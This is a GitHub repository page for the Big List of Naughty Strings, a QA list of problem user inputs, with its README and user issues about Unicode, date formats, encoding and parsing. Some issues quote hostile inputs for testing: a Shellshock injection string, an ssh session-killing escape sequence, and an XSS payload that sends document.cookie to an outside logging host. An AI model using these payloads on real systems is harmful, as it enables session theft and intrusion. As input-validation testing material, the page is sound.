minimaxir / big-list-of-naughty-strings

The Big List of Naughty Strings is a list of strings which have a high probability of causing issues when used as user-input data.

License: MIT License

Python 49.97% Shell 7.49% Go 38.09% Makefile 4.45%

big-list-of-naughty-strings's Introduction

Big List of Naughty Strings

The Big List of Naughty Strings is an evolving list of strings which have a high probability of causing issues when used as user-input data. This is intended for use in helping both automated and manual QA testing; useful for whenever your QA engineer walks into a bar.

Why Test Naughty Strings?

Even multi-billion dollar companies with huge amounts of automated testing can't find every bad input. For example, look at what happens when you try to Tweet a zero-width space (U+200B) on Twitter:

Although this is not a malicious error, and typical users aren't Tweeting weird unicode, an "internal server error" for unexpected input is never a positive experience for the user, and may in fact be a symptom of deeper string-validation issues. The Big List of Naughty Strings is intended to help reveal such issues.

Usage

blns.txt consists of newline-delimited strings and comments which are preceded with #. The comments divide the strings into sections for easy manual reading and copy/pasting into input forms. For those who want to access the strings programmatically, a blns.json file is provided containing an array with all the comments stripped out (the scripts folder contains a Python script used to generate the blns.json).
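A minimal sketch of reading both formats in Python, assuming the layout described above (one string per line, comment lines starting with #, and a plain JSON array in blns.json). The function name parse_blns and the sample data are illustrative and are not taken from the repository; skipping blank lines is also an assumption.

```python
import json


def parse_blns(text):
    """Return the non-comment, non-blank lines of a blns.txt-style document."""
    strings = []
    # Split on "\n" only: str.splitlines() would also break on characters
    # such as U+2028, which may appear inside a test string.
    for line in text.split("\n"):
        if line.startswith("#") or line.strip() == "":
            continue
        strings.append(line)
    return strings


# Hypothetical sample in the blns.txt layout (not copied from the real file).
sample_txt = "#\tReserved Strings\n\nundefined\nnull\n\n#\tNumeric Strings\n\n0\n1.00\n"
naughty = parse_blns(sample_txt)

# blns.json is described as a plain array, so json.loads is all that is needed.
sample_json = '["undefined", "null", "0", "1.00"]'
assert json.loads(sample_json) == naughty
```

To read the real files, pass the result of open("blns.txt", encoding="utf-8").read() to parse_blns, or call json.load on an open blns.json.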

Contributions

Feel free to send a pull request to add more strings, or additional sections. However, please do not send pull requests with very-long strings (255+ characters), as that makes the list much more difficult to view.

Likewise, please do not send pull requests which compromise manual usability of the file. This includes the EICAR test string, which can cause the file to be flagged by antivirus scanners, and files which alter the encoding of blns.txt. Also, do not send a null character (U+0000) string, as it changes the file format on GitHub to binary and renders it unreadable in pull requests. Finally, when adding or removing a string please update all files when you perform a pull request.

Disclaimer

The Big List of Naughty Strings is intended to be used for software you own and manage. Some of the Naughty Strings can indicate security vulnerabilities, and as a result using such strings with third-party software may be a crime. The maintainer is not responsible for any negative actions that result from the use of the list.

Additionally, the Big List of Naughty Strings is not a fully-comprehensive substitute for formal security/penetration testing for your service.

Library / Packages

Several implementations of the Big List of Naughty Strings are available through package managers. They are maintained by outside parties, but can be found here:

Library Link
Node https://www.npmjs.com/package/blns
Node https://www.npmjs.com/package/big-list-of-naughty-strings
.NET https://github.com/SimonCropp/NaughtyStrings
PHP https://github.com/mattsparks/blns-php
C++ https://github.com/eliabieri/blnscpp

Please open a PR to list others.

Maintainer/Creator

Max Woolf (@minimaxir)

License

MIT

big-list-of-naughty-strings's Issues

Question: How to protect yourself properly?

Now that we have a list of potential naughty strings, what do you do with it to protect yourself properly? What's the best way to use this list to protect your backend where user input is required?

I'll be using this list in a nodejs based app with a mongo db, is it "enough" to test if the user input .contains() a line from the list? What would be a better way to protect yourself, rather than just looping over the list and checking for something that's equal (or at least contains in the user input)?

Separate potentially dangerous strings to a separate file

Reading the discussion about removing the "DROP" statement from BLNS, I thought it may be a good idea to move potentially dangerous strings (the DROP statement, the XML fork bomb, etc.) to a file separate from blns.txt, so that testing can be done with no potential data loss.

This change will be particularly useful for testing in a production environment (I'm sure that some of the users using BLNS test directly in a production environment).

single blank

A single blank and strings with leading/trailing blanks are missing, especially " ". Also "%" and "_" (SQL LIKE wildcards).

Some un-code representation

I like this project, and am likely to pull its strings into a Java project I'm working on; however, that means extracting them and making them compatible with Java. It'd be nice to have a file that's parseable by other languages.

shell shock string

Maybe add the shell shock bash code injection string:

() { :;}; echo vulnerable

There might be a lot of more such strings for many different languages/environments.

Smart quotes in HTML

A Not-So-Hypothetical situation:

  • Your customer walks into a bar.
  • Your customer orders up some XML. Yum!
  • The customer isn't satisfied, so they edit the XML by hand. In Microsoft Word.
  • Suddenly, your customer's XML is filled with smart quotes.

What's a poor parser to do?

<foo val=“bar” />

I'm not sure how much of a problem that this actually is, so feel free to close this if it's a little too far-fetched.

It's one of those things that's technically-not-exactly-wrong, but also almost-definitely-not-right.

Date/Time/DateTime strings

There should be a section that contains Date, Time, and DateTime strings. Just as numbers can be encoded in various ways, so can these.

Is there a tutorial on how to alter blns.txt and then generate the other files? If so, I should be able to file a pull request for them. But just off the top of my head, and keeping it to English (the Scunthorpe Problem section and the comments don't contain other languages), I can think of several additions, some valid and some not:

January 23, 2016
23 JAN 2016
23 JAN 16
23-JAN-2016
23 January 2016
...
Jan. 23, 2016

00:00:00
00:00:00 AM
12:00:00 AM
12:00:00 PM
23:59:59.997
12:00:00
18:48:42
...
7:48 pm

January 23, 2016 12:00 am
23/1/16 14:54
...
20160123T000000

And for things that shouldn't be accepted

February 29, 2017
26:84:94
14:00 pm

The possibilities are endless, but aren't they always? Between the US order of M/D/Y and the European order of D/M/Y, 24 hour time, standardized timestamps, indicating UTC with a Z, would this be a valuable addition to the list?
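As a rough illustration of the M/D/Y versus D/M/Y problem, here is a sketch using Python's datetime.strptime. The helper try_parse, the two format constants, and the ambiguous input "1/2/16 14:54" are assumptions made for the example; month names such as "February" are matched under the default C locale.

```python
from datetime import datetime


def try_parse(value, fmt):
    """Return the parsed datetime, or None if value does not match fmt."""
    try:
        return datetime.strptime(value, fmt)
    except ValueError:
        return None


DMY = "%d/%m/%y %H:%M"  # European day-first order
MDY = "%m/%d/%y %H:%M"  # US month-first order

# Unambiguous: there is no month 23, so only the day-first reading parses.
day_first = try_parse("23/1/16 14:54", DMY)
month_first = try_parse("23/1/16 14:54", MDY)

# Ambiguous: both readings parse, but they disagree on the date.
feb_first = try_parse("1/2/16 14:54", DMY)
jan_second = try_parse("1/2/16 14:54", MDY)

# The "shouldn't be accepted" examples are rejected by strict formats.
rejected = [
    try_parse("February 29, 2017", "%B %d, %Y"),
    try_parse("26:84:94", "%H:%M:%S"),
    try_parse("14:00 pm", "%I:%M %p"),
]
```

The ambiguous case is the one a test suite cannot catch by looking for exceptions alone: both parses succeed, so the assertion has to be on the resulting date.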

Package.json

Add package.json so that repository can be added as dependency

Section for Date/Time values

Would a section for Date/Time values be a productive idea? To my knowledge, systems don't parse raw DateTime strings unless you explicitly say if it's a DateTime parser, and DateTime parsers don't take in raw DateTime strings, opting instead to use some sort of Date/Time selector widget on the client and doing the calculation on server.

Provide a list of suggested tests to perform

Even though I had been keeping an eye on this repo, I was surprised at how much I didn't know to test for when a recent post in /r/rust/ linked back to Eevee's "Dark corners of Unicode".

Currently, I think the BLNS suffers from a situation similar to "100% branch coverage gives a false sense of security" because it shares the same "If you're not asserting the right things..." problem.

Here are the things from that blog post (beyond the famous "Turkish I" problem) which I think should be covered in a supplementary "how to use the BLNS" document:

  • Test anything which involves sorting, case conversion, case-insensitive matching, date-handling, or working with decimals under the Turkish locale (It's not just the case-correspondence and sorting rules which differ)
  • Test your equality-testing and upper/lower-case conversion code against things like ß vs ss, ae vs æ, ... vs , and the NFC (normal form composed) vs. NFD (normal form decomposed) forms of characters like é which have both a combining-character representation and a precomposed representation for round-trip compatibility with legacy systems.
  • Test your normalization code against Japanese text, where stripping diacritics can result in significant changes in pronunciation and meaning. (On the order of confusing unvoiced and voiced versions of the same consonant, like "kook" (strange/eccentric/crazy person) and "gook" (a racial slur)).
  • Test that your code which slices or normalizes strings doesn't split apart flag emoji. (The underlying regional indicator symbol pairs are not declared as combining characters)
  • Test that your code doesn't break up emoji defined using U+200D ZERO WIDTH JOINER.
  • If you're not simply relying on a browser for text rendering, make sure that both normal forms of Hangul (the primary Korean writing system) render equivalently and properly.
  • If you're rendering your own character-cell graphics, make sure double-width characters added in newer versions of the Unicode spec, like 🎁 don't overdraw the character which follows them, get cut off, or throw off the column alignment.
  • Make sure your system displays characters from recent Unicode specs, given a suitable font. (WeeChat silently ignores emoji because it relies on a "how wide is this character" function which reports 0 for stuff that's too new for the bundled copy of the Unicode database)
  • Audit whether there's anywhere accepting the Ogham space character would be a "wetware exploit" (something where it's valid... but not what the human expects). For example, this JavaScript produces 42 as its output: alert(2+ 40);
  • Audit whether you're handling U+2800 BRAILLE PATTERN BLANK (looks like a space in most fonts, but isn't) appropriately.
  • Make sure everything in your stack handles emoji outside the Basic Multilingual Plane properly. (eg. MySQL's utf8 encoding is limited to three bytes per character, which doesn't cover all of the supplementary character planes, so you have to ALTER TABLE it to utf8mb4)
  • Make sure your system doesn't assume Apple's specific emoji font. They're unicode characters like anything else.
  • The unicode directionality characters in the BLNS are for testing to make sure your website is wrapping each piece of user-provided text in <bdi></bdi> (bidirectional isolation) elements so it can't alter the directionality of the rest of the content.

EDIT: In hindsight, that list would be much clearer if I formatted it as a table, with each row representing a type of input to test (eg. doesn't break up emoji defined using U+200D ZERO WIDTH JOINER) and each column representing where your program would be potentially vulnerable (eg. string slicing/replacement/etc.).
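A few of the checks in the list can be sketched with Python's standard library alone. This is only an illustration of the kind of assertion meant, not a complete test plan; the variable names are made up for the example, and the flag used (regional indicators J + P) is an arbitrary choice.

```python
import unicodedata

# NFC vs. NFD: the same visible "é" as one code point or as e + combining acute.
composed = "\u00e9"
decomposed = "e\u0301"
assert composed != decomposed
assert unicodedata.normalize("NFC", decomposed) == composed
assert unicodedata.normalize("NFD", composed) == decomposed

# Case conversion can change length: "ß" upper-cases to "SS".
assert "ß".upper() == "SS"
# casefold() is intended for caseless matching and maps "ß" to "ss".
assert "straße".casefold() == "strasse".casefold()

# A flag emoji is a pair of regional indicator code points, so slicing by
# code point can split the pair.
flag = "\U0001F1EF\U0001F1F5"
assert len(flag) == 2
half_flag = flag[:1]

# Characters outside the Basic Multilingual Plane need 4 bytes in UTF-8.
gift_bytes = len("🎁".encode("utf-8"))

# U+1680 OGHAM SPACE MARK is whitespace; U+2800 BRAILLE PATTERN BLANK is not.
ogham_is_space = "\u1680".isspace()
braille_is_space = "\u2800".isspace()
```

Each of these is a property of the input, so the useful test is the one that feeds the same values through your own slicing, comparison, or storage code and asserts on what comes out.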

'walks into a bar' link broken

The link provided in the README is broken; it seems that the destination site has removed all traces of '.aspx', and is blaming others for having outdated links. :(

`<plaintext>`

The <plaintext> tag is really naughty, as it is impossible to close it in any way using just HTML. Example at codepen.

Actually, in most cases even just <plaintext string in HTML context would be enough to break stuff.

Python escape sequences

Sometimes you find python escape characters are accepted (and decoded) where they shouldn't be. E.g. something that only accepts alphanumerics goes on to accept
\60
because unescaped it turns into the character '0' but after validation is passed it gets stored as "\60", thus coming back to bite you when it's read back and not unescaped.
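The mismatch described above can be reproduced in a few lines. This is a sketch under assumptions: the alphanumeric pattern and the variable names are invented for the example, and the unicode_escape codec stands in for whatever unescaping step the affected system performs.

```python
import re

ALNUM = re.compile(r"[A-Za-z0-9]+")

raw = r"\60"  # three characters: backslash, '6', '0'

# Octal escape 60 is code point 48, the character "0".
unescaped = raw.encode("ascii").decode("unicode_escape")

# Buggy flow: validate the unescaped form, then store the raw form.
passes_validation = ALNUM.fullmatch(unescaped) is not None
stored = raw

# Safer flow: validate exactly the value that will be stored.
raw_is_valid = ALNUM.fullmatch(raw) is not None
```

In the buggy flow the stored value contains a backslash even though validation claimed it was alphanumeric.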

JSON cannot represent some naughty strings

One of my favourite naughty strings is invalid utf-8 - for example, a bare \xff.
It's quite common to get 500s, etc. on these, as no one ever bothers to check for Unicode decoding errors.
However, because JSON requires all strings to be valid utf-8, this example is only able to be included in the txt file.

Would this be something worth including and adding a special case in the script to omit from the json?
Or is it too naughty for blns?

EDIT: This HN comment (https://news.ycombinator.com/item?id=10035738) suggested having the JSON file be of b64 encoded strings. This is a good suggestion, and allows arbitrary naughty bytes to be used, at the cost of readability.
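A sketch of the base64 idea in Python, assuming a JSON array of base64 strings as the file layout. The sample byte strings and variable names are illustrative; nothing here reflects an existing file in the repository.

```python
import base64
import json

naughty_bytes = [b"\xff", b"undefined", "田中".encode("utf-8")]

# A bare 0xFF byte is never valid UTF-8, so strict decoding raises.
try:
    b"\xff".decode("utf-8")
    decoded_ok = True
except UnicodeDecodeError:
    decoded_ok = False

# Base64 output is plain ASCII, so any byte sequence fits in a JSON string.
encoded = json.dumps([base64.b64encode(b).decode("ascii") for b in naughty_bytes])

# A consumer reverses the two steps to get the original bytes back.
restored = [base64.b64decode(s) for s in json.loads(encoded)]
```

The cost mentioned above is visible in the output: the first entry becomes "/w==", which tells a human reader nothing about what is being tested.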

where to put multiline strings?

this attack on webct has two different forms, one of them is a multiline string:

<div id="mycode" style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="// balupton's javascript session stealer automatic hack
	var iframe = document.createElement('iframe');
	iframe.style.border = 'none';
	iframe.style.height = '1px';
	iframe.style.width = '1px';
	var url =
		'http'+'://www.balupton.com/sandbox/logger.php'
		+'?variable=document.cookie'
		+'&value='+escape(document.cookie)
		+'&url='+escape(document.location)
		+'&pass_code=secret_key'
		;
	iframe.src = url;
	document.body.appendChild(iframe);">Thank you</div>

With the newline break of the javascript word being part of it. Here is the simplified version:

<div style="BACKGROUND: url('java
script:alert(123)')">Thank you</div>

However it seems blns.txt won't support it.

Newlines characters in base64

All base64 strings¹ end with a newline character, eg.:

>>> base64.b64decode("dW5kZWZpbmVkCg==")
b'undefined\n'
>>> base64.b64decode("dW5kZWYK")
b'undef\n'
>>> base64.b64decode("Q09NMQo=")
b'COM1\n'

Is this on purpose? That newline character seems pretty useless.
If not, that line should probably read echo -n.


1: all but the empty string itself, which makes it even more annoying because it makes two cases to handle.
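For comparison, here is the same string encoded with and without the trailing newline, using Python's base64 module. The mapping to echo and echo -n in the comments is an assumption based on the suggestion above.

```python
import base64

# What a plain `echo undefined` would feed to the encoder (assumed).
with_newline = base64.b64encode(b"undefined\n")

# What `echo -n undefined` would feed to the encoder (assumed).
without_newline = base64.b64encode(b"undefined")

decoded = base64.b64decode(without_newline)
```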

Japanese kana are 3 bytes, kanji are at least 3 bytes.

The .txt file comments say they are two-byte characters. A quick check with C's strlen indicates that Korean hangul are 3 bytes as well.

Two-Byte Characters

Strings which contain two-byte characters: can cause rendering issues or character-length issues

田中さんにあげて下さい
...
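The byte counts can be checked in Python. This sketch assumes the file is read as UTF-8, which is what strlen would be counting; the hangul sample "한" is an illustrative choice and not a string from the list. The UTF-16 column is included because "two-byte" is accurate for these characters in that encoding.

```python
samples = {"kana": "あ", "kanji": "田", "hangul": "한"}

# Map each sample to (bytes in UTF-8, bytes in UTF-16 without a BOM).
sizes = {
    name: (len(ch.encode("utf-8")), len(ch.encode("utf-16-le")))
    for name, ch in samples.items()
}

phrase = "田中さんにあげて下さい"
code_points = len(phrase)
utf8_bytes = len(phrase.encode("utf-8"))
```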

new string: ssh escape sequence

The sequence \n~. will cause default-configured ssh sessions to terminate when passed as input.
I realise it's horrifying but I have in fact seen this crop up in the wild where user data was transferred between machines via tar c ... | ssh other tar x (for anyone who finds this from google, the correct fix (besides "don't do that") is ssh -e none)

node module

I just made a convenience module and would like to add you as a maintainer on npm. If you could provide your npm ID, that would be useful.

to add:

found on twitter [ https://twitter.com/irongeek_adc ]: Nͣͥͬͩͣ̂̂̂̂̂̂̂̂̂̂̂̂̂̂

Date/Time Strings

Making a note to add date/time strings which can trip up naive date/time parsers:

  • non-US date/time formats (e.g. 2017.01.16)
  • Illegal dates/times (e.g. 2017-01-32 26:00)
  • Leap Day on non-leap year (e.g. 2017-02-29)
  • Timezones/illegal timezones

Reference: Wikipedia, xkcd
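One way to avoid being tripped up is to range-check every field explicitly. The sketch below does this with the calendar module; the function names, the year-first field order, and the extra leap-year input are assumptions for illustration, and timezones are not handled.

```python
import calendar
import re


def is_valid_datetime(year, month, day, hour=0, minute=0):
    """Range-check every field rather than trusting the input string."""
    if not 1 <= month <= 12:
        return False
    # monthrange returns (weekday of the 1st, number of days in the month).
    days_in_month = calendar.monthrange(year, month)[1]
    return 1 <= day <= days_in_month and 0 <= hour <= 23 and 0 <= minute <= 59


def check(text):
    """Pull the numeric fields out of a year-first string and validate them."""
    fields = [int(part) for part in re.findall(r"\d+", text)]
    return is_valid_datetime(*fields)


results = {
    "2017.01.16": check("2017.01.16"),              # dotted separators, real date
    "2017-01-32 26:00": check("2017-01-32 26:00"),  # day 32 and hour 26
    "2017-02-29": check("2017-02-29"),              # leap day in a non-leap year
    "2016-02-29": check("2016-02-29"),              # hypothetical: a real leap day
}
```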

add constructor and __proto__

Since JavaScript has become so popular, it's not uncommon for developers to use plain object initializers in the language (i.e. var hash = {}).

Asking objects whether key is in the hash is often done via

var hash = {}
function contains(key) {
  return key in hash
}

Which gives false-positives for words constructor and __proto__. This is a source of bugs that are hard to find. But maybe by adding these two words to your list, more people will test their code against this bug :).

Urgent, need bugfix for human injection.

If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.

World view changed. How can I contact outside world? How do I wake up from coma?

Remove trailing spaces from blns.json

I'd like to test that a round-trip for my JSON library does not produce any deviation. I have a pretty printer where I can adjust the indentation. The problem I have when comparing the result of the round-trip with the original blns.json is the trailing spaces at the end of (almost) each line. I don't think they serve any purpose, and it would make it easier for me and hopefully others as well if they could be removed.
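For reference, a sketch of a round-trip check using Python 3's json module, which writes "," rather than ", " at the end of each line when indent is set. The sample array is invented for the example, and this is not necessarily how the repository's generation script writes the file.

```python
import json

original = ["", "undefined", "田中さん", " leading and trailing "]

pretty = json.dumps(original, indent=2, ensure_ascii=False)

# Split on "\n" only, so unusual line separators inside a string are not
# mistaken for line breaks.
trailing = [line for line in pretty.split("\n") if line.endswith(" ")]

round_tripped = json.loads(pretty)
```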

UTF-8 byte order marker mid file

I apologize if this doesn't count, but one of my favorite/least favorite bugs is having a random UTF-8 byte order marker (BOM) mid file. This is often caused by naively concatenating files together.
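The bug is easy to reproduce in Python. In this sketch the two byte strings stand in for files that each start with a BOM, and concat_utf8 is a hypothetical helper showing one way to avoid the problem.

```python
import codecs

file_a = codecs.BOM_UTF8 + "first\n".encode("utf-8")
file_b = codecs.BOM_UTF8 + "second\n".encode("utf-8")

# Naive concatenation: "utf-8-sig" strips only the BOM at the very start,
# so the second BOM survives as U+FEFF in the middle of the text.
naive = (file_a + file_b).decode("utf-8-sig")


def concat_utf8(parts):
    """Decode each part on its own so every leading BOM is dropped."""
    return "".join(part.decode("utf-8-sig") for part in parts)


clean = concat_utf8([file_a, file_b])
```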

Easter egg?

While looking at the .txt file I found this one:

Human injection

Strings which may cause human to reinterpret worldview

If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.

Although I found it humorous, I don't think it's testing any actual bug, so maybe you should consider removing it. Or maybe just leave it as an easter egg; I just wanted to point it out to you.

Go package

Is the owner open to adding a .go file to make this repo importable as a Golang package? I can do a PR if so.

Strings out of scope

Looks like we're getting an ever-growing list of strings which are carefully crafted injections.
I believe this is entirely outside of the scope of this project.

Lines 195 to 434, for example, are complex strings which are designed to work in specific scenarios and would be used for fuzzing inputs. We should leave those kinds of strings to https://github.com/fuzzdb-project/fuzzdb and keep doing what the purpose of this project was to begin with.

If we were to merge everything from fuzzdb into the blns, it would become a mass of crap.
Yet we appear to be maintaining an incomplete collection of various fuzzing strings, most of which sit between lines 195 and 434.

Let me know what you all think about this proposition.
